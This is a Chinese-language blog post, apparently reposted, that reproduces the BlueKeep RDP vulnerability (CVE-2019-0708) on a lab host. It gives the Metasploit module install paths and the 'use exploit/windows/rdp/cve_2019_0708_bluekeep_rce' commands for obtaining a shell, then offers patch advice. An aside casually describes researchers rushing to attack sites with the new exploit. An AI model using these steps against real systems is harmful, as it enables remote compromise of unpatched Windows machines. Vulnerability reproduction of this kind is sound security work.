cve-2019-0708復現及經驗總結


0X01 漏洞描述:

  在2019年5月,微軟發布了針對遠程代碼執行漏洞CVE-2019-0708的補丁更新,該漏洞也稱為“BlueKeep”,漏洞存在於遠程桌面服務(RDS)的代碼中。此漏洞是預身份驗證,無需用戶交互,因此具有潛在武器化蠕蟲性性漏洞利用的危險。如果成功利用此漏洞,則可以使用“系統”權限執行任意代碼。Microsoft安全響應中心的建議表明這個漏洞也可能會成為一種蠕蟲攻擊行為,類似於Wannacry和EsteemAudit等攻擊行為。由於此漏洞的嚴重性及其對用戶的潛在影響,微軟采取了罕見的預警步驟,為不再受支持的Windows XP操作系統發布補丁,以保護Windows用戶。

   自該補丁於5月發布以來,該漏洞受到了安全行業的廣泛關注,在野利用漏洞只是時間問題。
   影響版本:
        Windows 7
        Windows Server 2008 R2
        Windows Server 2008
        Windows 2003
        Windows XP

0X02 漏洞復現:

  在19年的9月7號凌晨,這個漏洞的exp被公布到github上了。然后安全圈里的師傅們都震驚了,吆喝着起床日站。

      

    下面是土司社區大佬算命瞎子的朋友圈:

    

    

     

    exp剛出來的時候,下載導入metasploit:

1 rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit 
2 
3 rdp_scanner.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp 
4 
5 cve_2019_0708_bluekeep.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp 
6 
7 cve_2019_0708_bluekeep_rce.rb -> /usr/share/metasploit-framework/modules/exploits/windows/rdp 
8 需要注意如果沒有目錄就重新創建一下。

     進入msf控制台以后使用reload_all命令,重新加載所有模塊。然后搜索0708:

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > search 0708
=======

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/cve_2019_0708_bluekeep     2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check
   1  exploit/windows/browser/clear_quest_cqole        2012-05-19       normal  No     IBM Rational ClearQuest CQOle Remote Code Execution
   2  exploit/windows/browser/tumbleweed_filetransfer  2008-04-07       great   No     Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow
   3  exploit/windows/rdp/cve_2019_0708_bluekeep_rce   2019-05-14       manual  Yes    CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
   4  auxiliary/windows/rdp/cve_2019_0708_bluekeep     2019-05-14       normal  Yes    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check

設置參數:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.1.106
set target 1
exploit

 

這種情況是把目標主機打藍屏了。這個時候只需要添加一個參數即可獲取shell:

上面只是其中一種復現方式,另一種復現方式是在2019.4版本的kali上進行的,不需要導入exp直接可以搜索到。也不需要set forceexploit true,即可成功。

 

0X03 修復建議:

  微軟官方公告:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

  在沒有打補丁的時候建議關閉rdp服務。  

0X04 參考文章:

  http://www.nmd5.com/?p=409

   http://zone.secevery.com/article/1109

   https://mp.weixin.qq.com/s?__biz=MzUzMDUxNTE1Mw==&mid=2247485263&idx=2&sn=da247e593463b63b2253b0ce62787b69&chksm=fa51d2f1cd265be716d2517ddcfcc98e1bb3649181b3d250f66b05e0aa1b3a320b41ea901a13&mpshare=1&scene=1&srcid=0911j78dzFjBRUY6uHzeIEbd&sharer_sharetime=1568180742252&sharer_shareid=76a06f4576675deef8179292e6236ed2&key=42700e604ea8a865f4775c719d7fa0111b4d283e9036ad7e74b1d58709285c96c23987125384d5e4176b427f4328950e58897c622b1770d3eb1efef0c3c3b8cee305be0483e2224d3d821b2f262b9db0&ascene=1&uin=Mjc1NzUxODY0MA%3D%3D&devicetype=Windows+10&version=62060833&lang=zh_CN&pass_ticket=pAtBeQgmLbQrU%2Ft5nmU5pDFshboLEjqWILQbnelerMwoTPAwAp9JrFvGZDC7xh0r

  


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM